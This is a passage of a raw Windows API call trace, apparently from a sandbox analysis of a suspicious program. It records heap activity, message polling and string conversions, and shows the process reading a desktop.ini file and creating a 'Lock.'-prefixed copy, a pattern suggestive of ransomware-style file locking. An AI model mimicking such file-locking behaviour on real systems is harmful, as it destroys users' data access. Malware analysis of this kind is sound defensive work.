dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0223.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba70 | out: hHeap=0x2af0000) returned 1 [0223.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc80 | out: hHeap=0x2af0000) returned 1 [0223.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0223.232] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.232] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.232] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.232] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.232] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.233] CreateFileW (lpFileName="C:\\Users\\Public\\Documents/desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f4 [0223.237] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.237] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0223.237] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.237] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.237] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.237] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents/" (normalized: "c:\\users\\public\\documents")) returned 0x11 [0223.238] CreateFileW (lpFileName="C:\\Users\\Public\\Documents/Lock.desktop.ini" (normalized: "c:\\users\\public\\documents\\lock.desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b0 [0223.240] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.240] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.240] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.240] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.242] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0223.242] ReadFile (in: hFile=0x4f4, lpBuffer=0x3854008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3854008*, lpNumberOfBytesRead=0x8cf4f8*=0x116, lpOverlapped=0x0) returned 1 [0223.245] ReadFile (in: hFile=0x4f4, lpBuffer=0x3854008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3854008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0223.248] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.248] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.248] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.248] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0223.248] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.260] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0223.260] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0223.260] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0223.260] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0223.260] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0223.260] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0223.260] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.260] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0223.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0223.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0223.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0223.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0223.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0223.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0223.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0223.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0223.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0223.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0223.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0223.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0223.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0223.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0223.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0223.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0223.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0223.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0223.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0223.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0223.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0223.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0223.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0223.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0223.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0223.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0223.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0223.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0223.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0223.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0223.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0223.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0223.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0223.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0223.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0223.262] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0223.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0223.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0223.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0223.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0223.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0223.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0223.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0223.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0223.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0223.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0223.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0223.262] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0223.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0223.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0223.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0223.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0223.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0223.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0223.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0223.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0223.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0223.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0223.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0223.263] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0223.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0223.263] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0223.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab9e0 [0223.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0223.263] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0223.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0223.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0223.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0223.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0223.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0223.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0223.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0223.263] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0223.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0223.263] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.263] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0223.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0223.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0223.264] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0223.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab8a8 [0223.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73aa0 [0223.264] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0223.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0223.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0223.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0223.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0223.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0223.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0223.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0223.264] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0223.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0223.264] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.264] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0223.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0223.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0223.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0223.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0223.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0223.264] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.264] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0223.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0223.265] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0223.265] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0223.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0223.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0223.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0223.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0223.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0223.265] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0223.265] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.265] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0223.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0223.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0223.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0223.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0223.265] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.265] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0223.265] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0223.265] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0223.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0223.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0223.266] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.266] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0223.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0223.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0223.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0223.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0223.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0223.266] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.266] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0223.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0223.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0223.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0223.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0223.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0223.266] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.266] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.266] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0223.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0223.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0223.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0223.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0223.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0223.266] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabbd8 [0223.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0223.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0223.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabae8 [0223.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbd8 | out: hHeap=0x2af0000) returned 1 [0223.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0223.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0223.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0223.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc20 [0223.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0223.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabba8 [0223.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0223.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0223.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabbc0 [0223.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabba8 | out: hHeap=0x2af0000) returned 1 [0223.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0223.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbc0 | out: hHeap=0x2af0000) returned 1 [0223.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 